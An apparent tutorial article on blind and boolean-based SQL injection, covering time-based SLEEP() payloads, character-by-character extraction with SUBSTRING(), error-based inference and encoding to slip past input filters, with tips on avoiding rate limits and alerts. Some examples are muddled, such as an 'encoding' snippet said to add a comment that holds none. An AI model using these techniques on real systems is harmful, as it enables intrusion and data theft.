TL;DR
Yes, Blind SQL/Boolean Based SQL Injections often struggle with direct break characters (like newlines) and complex comparisons. This is due to how they work – relying on true/false responses from the server. However, there are ways around these limitations using alternative techniques.
Understanding the Problem
Blind SQL Injection doesn’t give you direct data back like regular SQL injection. Instead, you infer information by observing the server’s response to different queries. Boolean-based injections specifically rely on questions that result in a true or false answer, which changes the page content or HTTP status code.
Break characters and complex comparisons can interfere with this process because:
- Break Characters: The server might strip them out before the query is executed, or they could cause syntax errors.
- Comparisons: Simple equality/inequality checks are easier to detect than more complicated logic (e.g., greater than, less than, between).
Solutions & Workarounds
- Time-Based Blind SQL Injection: This is often the most reliable alternative when you can’t use boolean comparisons effectively.
- Instead of asking ‘is this true?’, you ask ‘how long does it take to execute this query?’.
- Use functions like
SLEEP()(MySQL) orpg_sleep()(PostgreSQL).
SELECT IF(1=1, SLEEP(5), 0); -- MySQL example - Conditional Comments (for specific platforms):
- In some older web applications (especially those using Microsoft technologies), you can use conditional comments to trigger different responses based on the truthiness of a condition.
- Exploiting Error Messages:
- Sometimes, even if you can’t get a clear true/false response, carefully crafted queries might trigger different error messages depending on the condition.
- This is less predictable but can provide valuable information.
- Substrings and Character-by-Character Extraction:
- If you need to extract data, focus on extracting it one character at a time using functions like
SUBSTRING().SELECT SUBSTRING(database(), 1, 1); -- Extract the first character of the database name. - Combine this with boolean logic to determine each character individually.
- If you need to extract data, focus on extracting it one character at a time using functions like
- Alternative Comparison Operators:
- Some databases support alternative comparison operators or functions that might be less prone to filtering.
SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END;
- Some databases support alternative comparison operators or functions that might be less prone to filtering.
- Encoding and Obfuscation:
- Try encoding special characters or using different character sets to bypass input filters. This is not always effective, but worth a try.
'1=1 AND 1=1%' -- Example of adding a comment to potentially bypass filtering
- Try encoding special characters or using different character sets to bypass input filters. This is not always effective, but worth a try.
Important Considerations
- Database-Specific Syntax: SQL syntax varies between databases (MySQL, PostgreSQL, Oracle, etc.). Adapt your queries accordingly.
- Input Filtering: Web applications often have input filters to prevent SQL injection. Identify and bypass these filters if possible.
- Rate Limiting: Excessive requests can trigger rate limiting or security alerts. Be mindful of the server’s capacity.